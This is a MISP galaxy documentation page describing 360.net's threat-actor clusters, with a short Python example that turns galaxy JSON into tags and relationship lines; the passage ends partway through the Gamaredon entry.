Introduction

MISP logo

The MISP threat sharing platform is free and open source software that supports the sharing of threat intelligence, including cyber security indicators, financial fraud and counter-terrorism information. The MISP project includes multiple sub-projects that support the operational requirements of analysts and improve the overall quality of the information shared.

MISP galaxy is a simple method of expressing a large object, called a cluster, that can be attached to MISP events or attributes. A cluster is composed of one or more elements, expressed as key-value pairs. Default vocabularies are available in MISP galaxy, but they can be overwritten, replaced or updated as you wish. Existing clusters and vocabularies can be used as-is or as a template. A MISP distribution level can be applied to each cluster to permit a narrower or broader distribution scheme. The following document is generated from the machine-readable JSON describing the MISP galaxy.

Funding and Support

The MISP project is financially and resource-supported by CIRCL (Computer Incident Response Center Luxembourg).

CIRCL logo

CEF (Connecting Europe Facility) funding under CEF-TC-2016-3 - Cyber Security was granted from 1st September 2017 until 31st August 2019 for "Improving MISP as building blocks for next-generation information sharing".

CEF funding

If you are interested in co-funding projects around MISP, feel free to get in touch with us.

MISP galaxy

360.net Threat Actors

Known or suspected adversary groups as identified by 360.net.

360.net Threat Actors is a cluster galaxy available in JSON format. The JSON can be freely reused in your application or automatically enabled in MISP.
authors

360.net
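The cluster entries below follow a fixed pattern: each element has a value, optional synonyms and references under meta, and related entries that point at other clusters by uuid, and MISP derives the tag shown as "The tag is:" from the galaxy type and the element value. The following Python is an added example, not part of the MISP project or the 360.net galaxy; it parses a constructed two-cluster sample in the galaxy cluster JSON layout (the uuids and the second cluster are made up for the example) and shows how the tags and the "has relationships with" lines on this page are produced from that JSON.

```python
import json
from typing import Dict, List, Optional

# Constructed sample in the MISP galaxy cluster JSON layout. The uuids are made up
# for this example and do not correspond to the real 360net-threat-actor galaxy.
GALAXY_JSON = r'''
{
  "name": "360.net Threat Actors",
  "type": "360net-threat-actor",
  "version": 1,
  "values": [
    {
      "value": "海莲花 - APT-C-00",
      "uuid": "11111111-1111-4111-8111-111111111111",
      "description": "OceanLotus, as tracked by 360.",
      "meta": {
        "synonyms": ["OceanLotus"],
        "refs": ["https://apt.360.net/report/apts/1.html"]
      },
      "related": [
        {
          "dest-uuid": "22222222-2222-4222-8222-222222222222",
          "type": "similar",
          "tags": ["estimative-language:likelihood-probability=\"likely\""]
        }
      ]
    },
    {
      "value": "Lazarus - APT-C-26",
      "uuid": "33333333-3333-4333-8333-333333333333",
      "meta": {"synonyms": ["APT38"], "refs": []}
    }
  ]
}
'''

# A second constructed cluster that the "related" entry above points at, standing
# in for a threat-actor galaxy element such as APT32.
OTHER_JSON = r'''
{"name": "Threat Actor", "type": "threat-actor", "version": 1,
 "values": [{"value": "APT32", "uuid": "22222222-2222-4222-8222-222222222222",
             "meta": {"synonyms": ["OceanLotus Group"]}}]}
'''


def misp_tag(galaxy_type: str, value: str) -> str:
    """Build the tag for a cluster element: misp-galaxy:<type>="<value>".
    A double quote inside a value would break tag parsing, so it is escaped."""
    return 'misp-galaxy:%s="%s"' % (galaxy_type, value.replace('"', '\\"'))


class GalaxyIndex:
    """Index one or more cluster galaxies by uuid, value and synonym."""

    def __init__(self, *galaxy_docs: str):
        self.by_uuid: Dict[str, dict] = {}
        self.by_name: Dict[str, dict] = {}
        for doc in galaxy_docs:
            galaxy = json.loads(doc)
            for elem in galaxy["values"]:
                entry = {"type": galaxy["type"], "value": elem["value"],
                         "uuid": elem["uuid"], "meta": elem.get("meta", {}),
                         "related": elem.get("related", [])}
                self.by_uuid[elem["uuid"]] = entry
                self.by_name[elem["value"].casefold()] = entry
                # Synonyms are secondary keys; a value name always wins over a synonym.
                for syn in elem.get("meta", {}).get("synonyms", []):
                    self.by_name.setdefault(syn.casefold(), entry)

    def lookup(self, name: str) -> Optional[dict]:
        return self.by_name.get(name.casefold())

    def tag_for(self, name: str) -> Optional[str]:
        entry = self.lookup(name)
        return misp_tag(entry["type"], entry["value"]) if entry else None

    def relationships(self, name: str) -> List[str]:
        """Resolve 'related' dest-uuids to tag strings, rendered as on this page:
        '<type>: <tag> with <qualifier tags>'. A dest-uuid that matches nothing is
        reported explicitly rather than dropped, since it is a data-quality defect."""
        entry = self.lookup(name)
        lines = []
        for rel in (entry["related"] if entry else []):
            dest = self.by_uuid.get(rel["dest-uuid"])
            target = (misp_tag(dest["type"], dest["value"]) if dest
                      else "unresolved uuid %s" % rel["dest-uuid"])
            qualifiers = " ".join(rel.get("tags", []))
            suffix = " with " + qualifiers if qualifiers else ""
            lines.append("%s: %s%s" % (rel["type"], target, suffix))
        return lines


if __name__ == "__main__":
    idx = GalaxyIndex(GALAXY_JSON, OTHER_JSON)
    print(idx.tag_for("OceanLotus"))
    for line in idx.relationships("海莲花 - APT-C-00"):
        print(line)
```

The index is keyed by uuid for relationship resolution and by case-folded name for lookups, because the same actor appears under different names across galaxies (here "OceanLotus" in the 360.net cluster and "APT32" in the threat-actor cluster) and the relationship edge, not the name, is what ties them together.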

CIA - APT-C-39

APT-C-39 is a high-profile, highly capable APT group from the United States, linked to the NSA and belonging to the CIA. It has carried out network intrusions against key sectors in China for eleven years; Chinese aerospace, scientific research institutions, the oil industry, large internet companies and government agencies have all been attacked to varying degrees.

The tag is: misp-galaxy:360net-threat-actor="CIA - APT-C-39"

Table 1. Table References

Links

https://apt.360.net/report/apts/96.html

https://apt.360.net/report/apts/12.html

海莲花 - APT-C-00

The 海莲花 (OceanLotus) APT group is a highly organised and professional overseas state-level hacking group, first discovered and disclosed by 360. Since at least April 2012 it has conducted organised, planned, targeted and continuous long-term attacks against important Chinese sectors including government, research institutes, maritime agencies, marine construction and shipping companies.

The tag is: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00"

海莲花 - APT-C-00 is also known as:

  • OceanLotus

海莲花 - APT-C-00 has relationships with:

  • similar: misp-galaxy:threat-actor="APT32" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT32 - G0050" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Canvas Cyclone" with estimative-language:likelihood-probability="likely"

Table 2. Table References

Links

https://apt.360.net/report/apts/93.html

https://apt.360.net/report/apts/1.html

https://apt.360.net/report/apts/94.html

摩诃草 - APT-C-09

The 摩诃草 group (APT-C-09), also known as HangOver, VICEROY TIGER, The Dropping Elephant and Patchwork, is an overseas APT group from South Asia that has been active for 12 years. It was first exposed by the security company Norman in 2013, and other security vendors have since continued to track and disclose its latest activity; the exposure did not stop its attacks, and the group has in fact been more active since 2015. It conducts cyber espionage mainly against China, Pakistan and other Asian countries, primarily to steal sensitive information. Its earliest known activity dates to November 2009 and it remains very active. In attacks against China it mainly targets government agencies and the scientific research and education sector, with the latter as its main focus.

The tag is: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09"

摩诃草 - APT-C-09 is also known as:

  • HangOver

  • VICEROY TIGER

  • The Dropping Elephant

  • Patchwork

摩诃草 - APT-C-09 has relationships with:

  • similar: misp-galaxy:threat-actor="VICEROY TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="QUILTED TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Patchwork - G0040" with estimative-language:likelihood-probability="likely"

Table 3. Table References

Links

https://apt.360.net/report/apts/110.html

https://apt.360.net/report/apts/6.html

黄金鼠 - APT-C-27

Since November 2014, the 黄金鼠 (Golden Rat) group (APT-C-27) has carried out organised, planned, targeted and continuous long-term attacks against the Syrian region. Its attack platform expanded from Windows to Android; to date we have captured 29 Android samples, 55 Windows samples and 9 C&C domains. APT-C-27 was named Golden Rat for several reasons: first, the group expends substantial resources in its attacks, indicating that it is well resourced, and the golden hamster has a habit of hoarding food in the wild, so the name also connotes abundance; second, the group attacks at intervals and then goes quiet, which resembles the behaviour of rats; third, the golden hamster is a representative animal of the Syrian region.

The tag is: misp-galaxy:360net-threat-actor="黄金鼠 - APT-C-27"

Table 4. Table References

Links

https://apt.360.net/report/apts/100.html

https://apt.360.net/report/apts/98.html

https://apt.360.net/report/apts/26.html

Lazarus - APT-C-26

Lazarus is an APT group suspected to originate from North Korea. It has long conducted intrusions against South Korea and the United States, and also attacks financial institutions worldwide, making it arguably the greatest threat to global financial institutions. Its earliest activity dates to 2007. According to investigations by foreign security companies, Lazarus is linked to the 2014 Sony Pictures hack, the 2016 Bangladesh Bank data breach, and the 2017 attacks on US defence contractors, the US energy sector and Bitcoin exchanges in the UK and South Korea. The notorious 2017 global "WannaCry" ransomware outbreak is also suspected to be the group's work.

The tag is: misp-galaxy:360net-threat-actor="Lazarus - APT-C-26"

Lazarus - APT-C-26 is also known as:

  • APT38

Lazarus - APT-C-26 has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT38 - G0082" with estimative-language:likelihood-probability="likely"

Table 5. Table References

Links

https://apt.360.net/report/apts/9.html

https://apt.360.net/report/apts/101.html

https://apt.360.net/report/apts/90.html

黄金雕 - APT-C-34

The activity of the 黄金雕 (Golden Eagle) group mainly affects Central Asia, mostly within Kazakhstan. Its targets include the education sector, government personnel, researchers, media workers, parts of commerce and industry, military personnel, religious figures, political dissidents and diplomats. The group uses social engineering, physical access and radio interception in its attacks, and has also procured tooling from cyber-arms vendors such as HackingTeam and NSO Group, giving it advanced intrusion capability including 0-day exploits. With reference to the Central Asian tradition of hunting with trained falcons, 360 named the group Golden Eagle (APT-C-34).

The tag is: misp-galaxy:360net-threat-actor="黄金雕 - APT-C-34"

Table 6. Table References

Links

https://apt.360.net/report/apts/11.html

盲眼鹰 - APT-C-36

Since April 2018, a suspected South American APT group, 盲眼鹰 (Blind Eagle, APT-C-36), has carried out organised, planned, targeted and continuous long-term attacks against important Colombian sectors, including government agencies and large companies in finance, oil and manufacturing. Its attack platform is mainly Windows and its targets are Colombian government and enterprise organisations. Because one distinctive target was the Colombian National Institute for the Blind, and because Colombia is known in football as the "eagles of South America", combined with other characteristics of the group and the 360 Threat Intelligence Center naming convention for APT groups, we named it Blind Eagle (APT-C-36).

The tag is: misp-galaxy:360net-threat-actor="盲眼鹰 - APT-C-36"

Table 7. Table References

Links

https://apt.360.net/report/apts/83.html

毒针 - APT-C-31

On 25 November 2018, 360's Advanced Threat Response Team was the first worldwide to detect an APT attack against Russia, targeting a medical institution under the Office of the President of Russia. The attack used the Flash 0-day CVE-2018-15982 and the Hacking Team RCS backdoor. Based on the medical function of the targeted institution, 360 named this APT operation 毒针 (Poison Needle).

The tag is: misp-galaxy:360net-threat-actor="毒针 - APT-C-31"

Table 8. Table References

Links

https://apt.360.net/report/apts/10.html

ArmaRat - APT-C-33

In July 2016, 360 discovered an APT campaign that had targeted Iranian Android users for two years. The attackers distributed a disguised ArmaRat trojan through the Telegram messaging app; once installed it gives the attacker full control of the phone and real-time monitoring of the user. Because the keyword "arma" appears in both the C&C infrastructure and the code structure throughout the trojan's evolution, we named the group "ArmaRat".

The tag is: misp-galaxy:360net-threat-actor="ArmaRat - APT-C-33"

Table 9. Table References

Links

https://apt.360.net/report/apts/48.html

军刀狮 - APT-C-38

Since July 2015, the 军刀狮 (Saber Lion) group (APT-C-38) has carried out organised, planned and targeted continuous attacks in the Middle East on both Windows and Android. One of its main distinctive targets is the Kurdish population of a West Asian Middle Eastern country; the PDB paths of its Windows RAT repeatedly contain "Saber"; and the Asiatic lion is the representative animal of that country. Combined with other characteristics of the group and 360's naming convention for APT groups, we named it Saber Lion (APT-C-38).

The tag is: misp-galaxy:360net-threat-actor="军刀狮 - APT-C-38"

Table 10. Table References

Links

https://apt.360.net/report/apts/30.html

拍拍熊 - APT-C-37

The 拍拍熊 group (APT-C-37) has carried out organised, planned, targeted and continuous long-term attacks against the extremist organisation "Islamic State", on both Windows and Android.

The tag is: misp-galaxy:360net-threat-actor="拍拍熊 - APT-C-37"

Table 11. Table References

Links

https://apt.360.net/report/apts/28.html

https://apt.360.net/report/apts/103.html

人面狮 - APT-C-15

Operation 人面狮 (literally "Sphinx") is a cyber-espionage campaign active in the Middle East whose targets likely include various organisations in countries such as Egypt and Israel, with the aim of stealing sensitive data. Activity was concentrated between June 2014 and November 2015, with the earliest related activity traced to December 2011. It mainly uses social networks for watering-hole attacks; to date 314 malicious code samples and 7 C&C domains have been captured.

The tag is: misp-galaxy:360net-threat-actor="人面狮 - APT-C-15"

Table 12. Table References

Links

https://apt.360.net/report/apts/8.html

美人鱼 - APT-C-07

The 美人鱼 (Mermaid) group (APT-C-07) is an overseas APT group from the Middle East that has been active for 9 years. It conducts cyber espionage mainly against government agencies to steal sensitive information; an attack against the Danish Ministry of Foreign Affairs has been confirmed.

The tag is: misp-galaxy:360net-threat-actor="美人鱼 - APT-C-07"

Table 13. Table References

Links

https://apt.360.net/report/apts/4.html

双尾蝎 - APT-C-23

Since May 2016, the 双尾蝎 (Two-tailed Scorpion) group (APT-C-23) has carried out organised, planned, targeted and continuous long-term attacks against important Palestinian sectors such as educational and military institutions. Its attack platforms include Windows and Android and its scope is mainly the Middle East; to date we have captured 24 Android samples, 19 Windows samples and 29 C&C domains. APT-C-23 was named Two-tailed Scorpion for several reasons: first, the group attacked both Palestine and Israel, two parties with a degree of mutual hostility, which is rare; second, it attacks on both Windows and Android. Although some APT groups we intercepted previously also attacked multiple platforms, such as OceanLotus, the vast majority still focus on Windows, and a group that gives equal weight to both platforms and is this active on Android is uncommon. Third, the scorpion is a representative animal of the Palestinian and Israeli region.

The tag is: misp-galaxy:360net-threat-actor="双尾蝎 - APT-C-23"

Table 14. Table References

Links

https://apt.360.net/report/apts/27.html

蓝宝菇 - APT-C-12

Since 2011, the advanced attack group 蓝宝菇 (APT-C-12) has conducted continuous cyber espionage against key Chinese units and departments in government, the defence industry, scientific research and finance. The group is mainly interested in the nuclear industry and research-related information. Its targets are concentrated in mainland China.

The tag is: misp-galaxy:360net-threat-actor="蓝宝菇 - APT-C-12"

蓝宝菇 - APT-C-12 is also known as:

  • 核危机行动(Operation NuclearCrisis)

Table 15. Table References

Links

https://apt.360.net/report/apts/7.html

毒云藤 - APT-C-01

APT-C-01, also known as 毒云藤 (Poison Vine), is an APT group that has long targeted China and has been active since at least 2007. It has conducted 11 years of cyber espionage against key Chinese units and departments in defence, government, technology, education and maritime affairs, focusing on the defence industry, China-US relations, cross-strait relations and maritime matters, with the aim of stealing major decisions and sensitive information. APT-C-01 was first disclosed by the 360 Threat Intelligence Center and was named 毒云藤 after a climbing plant common in the region associated with the group.

The tag is: misp-galaxy:360net-threat-actor="毒云藤 - APT-C-01"

毒云藤 - APT-C-01 is also known as:

  • 穷奇

  • 白海豚

  • 绿斑

Table 16. Table References

Links

https://apt.360.net/report/apts/2.html

Darkhotel - APT-C-06

Darkhotel (APT-C-06) is an APT group that has long conducted cyber-espionage attacks against corporate executives, the defence industry, the electronics industry and other important organisations. In November 2014, Kaspersky Lab researchers first disclosed the Darkhotel APT group, stating that it had been active since at least 2010 with targets mostly in South Korea, China, Russia and Japan. Kaspersky named the group Darkhotel because the campaign that was exposed used hotel Wi-Fi networks to target senior executives in manufacturing, defence, investment capital, private equity, automotive and other industries.

The tag is: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06"

Darkhotel - APT-C-06 is also known as:

  • Luder

  • Karba

  • Tapaoux

  • Dubnium

  • SIG25

Darkhotel - APT-C-06 has relationships with:

  • similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Darkhotel - G0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="DUBNIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Zigzag Hail" with estimative-language:likelihood-probability="likely"

Table 17. Table References

Links

https://apt.360.net/report/apts/97.html

https://apt.360.net/report/apts/3.html

奇幻熊 - APT-C-20

APT28 (APT-C-20), also known as Pawn Storm, Sofacy, Sednit, Fancy Bear and Strontium, is suspected of being linked to the Russian government; its earliest known activity dates to 2004. Its main targets include the defence industry, militaries, government organisations and the media. It has used a large number of 0-day vulnerabilities, and its malware targets not only PC operating systems such as Windows and Linux but also mobile operating systems such as Apple iOS. It has previously been suspected of involvement in cyber attacks on NATO. In the first quarter of 2015 APT28 was highly active, attacking NATO member states and governments in Europe, Asia and the Middle East. Many security vendors suspect a link to the Russian government, and the group was earlier suspected of covertly investigating the MH17 incident. Since 2016 its latest targets have included senior Turkish officials.

The tag is: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20"

奇幻熊 - APT-C-20 is also known as:

  • APT28

  • Pawn Storm

  • Sofacy Group

  • Sednit

  • Fancy Bear

  • STRONTIUM

奇幻熊 - APT-C-20 has relationships with:

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Forest Blizzard" with estimative-language:likelihood-probability="likely"

Table 18. Table References

Links

https://apt.360.net/report/apts/120.html

https://apt.360.net/report/apts/72.html

沙虫 - APT-C-13

The 沙虫 (Sandworm) group's main target sectors are government, education, energy and telecommunications operators, with espionage focused on European and US governments, NATO and the Ukrainian government. The group used a 0-day (CVE-2014-4114) in a phishing attack on the Ukrainian government, and also attacked the United States during the NATO summit in Wales that discussed the Ukraine crisis. It has used the BlackEnergy malware. Beyond conventional cyber espionage, Sandworm has also attacked SCADA systems; researchers believe this activity was reconnaissance for later attacks. There is some evidence that BlackEnergy was involved in attacks on Ukrainian industrial targets such as the power grid; if BlackEnergy was indeed used in those attacks, Sandworm may be behind them.

The tag is: misp-galaxy:360net-threat-actor="沙虫 - APT-C-13"

沙虫 - APT-C-13 is also known as:

  • SandWorm

沙虫 - APT-C-13 has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Seashell Blizzard" with estimative-language:likelihood-probability="likely"

Table 19. Table References

Links

https://apt.360.net/report/apts/87.html

https://apt.360.net/report/apts/69.html

肚脑虫 - APT-C-35

The APT-C-35 (肚脑虫) group, also known as Donot, conducts cyber espionage against government agencies and other sectors in countries connected to the Kashmir region, mainly to steal sensitive information. It was first exposed by 360's Helios (追日) team in March 2017, and several Chinese and foreign security teams have since tracked and disclosed its latest activity. Its attacks date back to April 2016 and continue today, mainly via spear-phishing emails.

The tag is: misp-galaxy:360net-threat-actor="肚脑虫 - APT-C-35"

肚脑虫 - APT-C-35 is also known as:

  • Donot

Table 20. Table References

Links

https://apt.360.net/report/apts/102.html

https://apt.360.net/report/apts/32.html

蔓灵花 - APT-C-08

The 蔓灵花 group uses spear-phishing emails and system vulnerabilities to attack mainly government, power and industrial organisations, primarily to steal sensitive information. The earliest foreign samples appeared in November 2013, with sample compilation timestamps concentrated between July 2015 and September 2016. The security company Forcepoint first reported the group in 2016; it has been observed repeatedly since and remains very active.

The tag is: misp-galaxy:360net-threat-actor="蔓灵花 - APT-C-08"

Table 21. Table References

Links

https://apt.360.net/report/apts/5.html

索伦之眼 - APT-C-16

The 索伦之眼 (Eye of Sauron) group (APT-C-16), also known as Sauron and Strider, conducts cyber espionage against China, Russia and several other countries, mainly to steal sensitive information. Related activity dates to 2010 and the group remains very active. Its operations are highly covert and highly targeted: it uses customised malware or communication infrastructure for specific targets and does not reuse attack resources. The complexity of its malicious code rivals that of Equation, and its overall capability is no weaker than that of the groups behind Stuxnet and Flame.

The tag is: misp-galaxy:360net-threat-actor="索伦之眼 - APT-C-16"

索伦之眼 - APT-C-16 is also known as:

  • Sauron

  • Strider

索伦之眼 - APT-C-16 has relationships with:

  • similar: misp-galaxy:threat-actor="ProjectSauron" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Strider - G0041" with estimative-language:likelihood-probability="likely"

Table 22. Table References

Links

https://apt.360.net/report/apts/70.html

潜行者 - APT-C-30

The 潜行者 (Stalker) group mainly collects sensitive information from government agencies, defence departments and intelligence agencies in Southeast Asian countries, and has conducted cyber attacks against China for more than ten years. It mainly targets key units in government and telecommunications. Its attacks can be traced back to 2009, the earliest sample compilation timestamp is 2008, and activity continues today.

The tag is: misp-galaxy:360net-threat-actor="潜行者 - APT-C-30"

Table 23. Table References

Links

https://apt.360.net/report/apts/82.html

响尾蛇 - APT-C-24

APT-C-24, also known as Sidewinder and Rattlesnake, is an APT group with an Indian background. It usually targets countries in South Asia and the surrounding region, including Pakistan, China and Nepal, mainly attacking government, military and diplomatic organisations; one of its most common infection vectors is malicious documents carrying exploits. In early 2020 the group also used COVID-19-themed decoy documents in attacks on Bangladesh, China and Pakistan. Tracking in recent years shows that Sidewinder increasingly uses trending topics such as COVID-19 and various political issues as social-engineering lures, so extra vigilance is warranted.

The tag is: misp-galaxy:360net-threat-actor="响尾蛇 - APT-C-24"

响尾蛇 - APT-C-24 is also known as:

  • SideWinder

响尾蛇 - APT-C-24 has relationships with:

  • similar: misp-galaxy:threat-actor="RAZOR TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Sidewinder - G0121" with estimative-language:likelihood-probability="likely"

Table 24. Table References

Links

https://apt.360.net/report/apts/92.html

ScarCruft - APT-C-28

The APT-C-28 group, also known as ScarCruft, APT37 (Reaper) and Group123, is an overseas APT group from Northeast Asia whose activity dates to 2012 and which remains active. It conducts cyber espionage mainly against South Korea and other Asian countries, primarily stealing intelligence and sensitive data related to strategic military, political and economic interests. It was first exposed by Kaspersky in June 2016, and security vendors have since continued to track and disclose its latest activity.

The tag is: misp-galaxy:360net-threat-actor="ScarCruft - APT-C-28"

ScarCruft - APT-C-28 is also known as:

  • APT37 (Reaper)

  • Group123

ScarCruft - APT-C-28 has relationships with:

  • similar: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT37 - G0067" with estimative-language:likelihood-probability="likely"

Table 25. Table References

Links

https://apt.360.net/report/apts/79.html

Turla - APT-C-29

The Turla group, also known as Waterbug, Venomous Bear and Group 88, is an APT group with a Russian background, active since at least 1996 and more frequently since 2015. Its targets span many countries and sectors including government, diplomacy, military, education, research and healthcare. It is known for watering-hole attacks, spear phishing and custom malware.

The tag is: misp-galaxy:360net-threat-actor="Turla - APT-C-29"

Turla - APT-C-29 is also known as:

  • Turla

  • Waterbug

  • Venomous Bear

  • Group 88

Table 26. Table References

Links

https://apt.360.net/report/apts/81.html

https://apt.360.net/report/apts/88.html

Carbanak - APT-C-11

Carbanak (also known as Anunak) is a transnational cybercrime group. Since 2013 it has attacked about 100 banks, electronic payment systems and other financial institutions in some 30 countries and regions, and related activity remains active.

The tag is: misp-galaxy:360net-threat-actor="Carbanak - APT-C-11"

Carbanak - APT-C-11 is also known as:

  • Anunak

Carbanak - APT-C-11 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Carbanak - G0008" with estimative-language:likelihood-probability="likely"

Table 27. Table References

Links

https://apt.360.net/report/apts/68.html

飞鲨 - APT-C-17

APT-C-17 is an APT attack discovered by 360, which we named Operation 飞鲨 (Flying Shark). Related activity dates from January 2013 and remained active until March 2014, mainly targeting China's aerospace sector to steal sensitive data from target users. No related attacks have been observed recently.

The tag is: misp-galaxy:360net-threat-actor="飞鲨 - APT-C-17"

Table 28. Table References

Links

https://apt.360.net/report/apts/71.html

方程式 - APT-C-40

APT-C-40 (方程式, Equation) is the most capable APT group on record. It has been active for nearly 20 years, surpasses all previous cyber-attack groups in attack complexity and sophistication, and is believed to be the operator behind the well-known Stuxnet and Flame malware.

The tag is: misp-galaxy:360net-threat-actor="方程式 - APT-C-40"

Table 29. Table References

Links

https://apt.360.net/report/apts/85.html

透明部落 - APT-C-56

Operation C-Major, also known as Transparent Tribe, APT36 and Mythic Leopard, is an APT group with a Pakistani background. Its activity has a broad footprint, but its main targets are Indian government and military organisations; in the name of national interest, civil society groups and politicians within Pakistan are also major targets. The group was first discovered in 2013 and has remained active in recent years. In early 2020 it launched spear-phishing attacks on Indian government organisations and defence personnel using decoy documents about the India-Pakistan border dispute, the so-called "Honey Trap" operation, to steal state secrets and sensitive data.

The tag is: misp-galaxy:360net-threat-actor="透明部落 - APT-C-56"

透明部落 - APT-C-56 is also known as:

  • APT36

  • ProjectM

  • C-Major

透明部落 - APT-C-56 has relationships with:

  • similar: misp-galaxy:threat-actor="Operation C-Major" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Transparent Tribe - G0134" with estimative-language:likelihood-probability="likely"

Table 30. Table References

Links

腾云蛇 - APT-C-61

APT-C-61, also known as 腾云蛇, has been active since at least January 2020 and remains active. It mainly targets state institutions, the defence industry, scientific research and defence organisations in Pakistan, Bangladesh and other countries. It penetrates targets through spear-phishing emails combined with social engineering, delivers malware to target devices, covertly controls them and continuously steals sensitive files. It was named for its reliance on cloud services for C2, payload delivery and storage of stolen data, and for its use of a trojan written in Python.

The tag is: misp-galaxy:360net-threat-actor="腾云蛇 - APT-C-61"

Table 31. Table References

Links

Kimsuky - APT-C-55

Kimsuky is a North Korea-based APT group, also known as Mystery Baby, Baby Coin, Smoke Screen, BabyShark and Cobra Venom, first disclosed by Kaspersky in 2013. It has long targeted South Korean think tanks, government and diplomatic bodies, news organisations and academic institutions, and in recent years has expanded its targets to include the United States, Russia and European countries. Its main aims are intelligence theft and espionage. The group is very active; its common payloads include exploit-laden HWP files, malicious macro documents and PE files that drop further payloads.

The tag is: misp-galaxy:360net-threat-actor="Kimsuky - APT-C-55"

Table 32. Table References

Links

卢甘斯克组织 - APT-C-46

In early 2019 a foreign security vendor disclosed targeted attacks against the Ukrainian government by an APT group with a suspected Luhansk background. According to the report, the group's activity dates back to at least 2014; it has extensively used phishing and watering-hole attacks against Ukrainian government agencies, and in past campaigns has used the open-source Quasar RAT and the VERMIN malware to capture audio and video, steal passwords and obtain confidential documents.

The tag is: misp-galaxy:360net-threat-actor="卢甘斯克组织 - APT-C-46"

卢甘斯克组织 - APT-C-46 is also known as:

  • APT-C-46

Table 33. Table References

Links

https://apt.360.net/report/apts/169.html

旺刺组织 - APT-C-47

Recently, 360 Security Brain detected several attacks using malicious ClickOnce programs. In-depth analysis by the 360 Advanced Threat Research Institute found this to be a campaign by a previously undisclosed APT group from the Korean Peninsula region, targeting organisations and individuals connected to the peninsula; 360 Security Brain data shows that the group's activity dates back to 2018. No security vendor has publicly disclosed this group's activity, nor any real APT attack using this technique. Since this was the first capture and disclosure of the campaign worldwide, 360 named the group 旺刺 (a homophone of its signature technique) and assigned it the new identifier APT-C-47.

The tag is: misp-galaxy:360net-threat-actor="旺刺组织 - APT-C-47"

旺刺组织 - APT-C-47 is also known as:

  • APT-C-47

Table 34. Table References

Links

https://apt.360.net/report/apts/168.html

DomesticKitten - APT-C-50

Domestic Kitten (Check Point), alias APT-C-50, was first disclosed by a foreign security vendor. Since 2016 it has conducted extensive and targeted attacks against internal dissidents and opposition forces in a Middle Eastern country, supporters of ISIS, and the Kurdish minority settled mainly in the west of that country. Notably, all of its targets are citizens of that country. Government agencies of that country, such as the Islamic Revolutionary Guard Corps (IRGC), the Ministry of Intelligence and the Ministry of the Interior, may support the group.

The tag is: misp-galaxy:360net-threat-actor="DomesticKitten - APT-C-50"

DomesticKitten - APT-C-50 is also known as:

  • APT-C-50

Table 35. Table References

Links

https://apt.360.net/report/apts/166.html

SandCat - APT-C-32

SandCat was first discovered by Kaspersky in 2018. The group has been using FinFisher/FinSpy spyware and the CHAINSHOT attack framework, has 0-day capability, and has used CVE-2018-8589 and CVE-2018-8611. It mainly attacks targets in the Middle East, Africa and Eastern Europe.

The tag is: misp-galaxy:360net-threat-actor="SandCat - APT-C-32"

Table 36. Table References

Links

CNC - APT-C-48

The group was discovered in 2019 and is provisionally called CNC because the PDB paths of its samples contain the string cnc_client. It conducts targeted attacks against China's education, aerospace, defence and healthcare sectors to steal intelligence. During attacks it attempts to use N-day exploits, and it has developers capable of writing Go-language trojans.

The tag is: misp-galaxy:360net-threat-actor="CNC - APT-C-48"

Table 37. Table References

Links

蓝色魔眼 - APT-C-41

APT-C-41 is an APT group with a Turkish background whose earliest activity dates to 2012. It mainly attacks Italy, Turkey, Belgium, Syria and other European countries and regions. In 2020, 360 discovered attacks by the group against Chinese organisations and designated it APT-C-41.

The tag is: misp-galaxy:360net-threat-actor="蓝色魔眼 - APT-C-41"

Table 38. Table References

Links

https://apt.360.net/report/apts/158.html

Machete - APT-C-43

El Machete was first discovered by Kaspersky; its earliest attacks date to 2014 and it mainly targets Latin America. 360 Baize Lab (白泽实验室) discovered a new Python backdoor, Pyark; through in-depth analysis and attribution of this backdoor we uncovered a series of advanced threat operations active since 2019, in which the attackers compromised multiple Venezuelan military institutions, deployed the backdoor, and continuously monitored and stole the latest military secrets.

The tag is: misp-galaxy:360net-threat-actor="Machete - APT-C-43"

Machete - APT-C-43 is also known as:

  • Machete

Machete - APT-C-43 has relationships with:

  • similar: misp-galaxy:threat-actor="El Machete" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Machete - G0095" with estimative-language:likelihood-probability="likely"

Table 39. Table References

Links

https://apt.360.net/report/apts/159.html

Gamaredon - APT-C-53

Gamaredon, also known as Primitive Bear, Winterflounder and BlueAlpha, has been active since at least 2013 and is a Russian state-sponsored APT group. It conducts cyber espionage mainly against Ukrainian government, defence, diplomatic and news media organisations. In recent years its members have continued to upgrade their tactics and develop custom malware, making it harder for defenders to capture and track the group.

The tag is: misp-galaxy:360net-threat-actor="Gamaredon - APT-C-53"

Gamaredon - APT-C-53 is also known as:

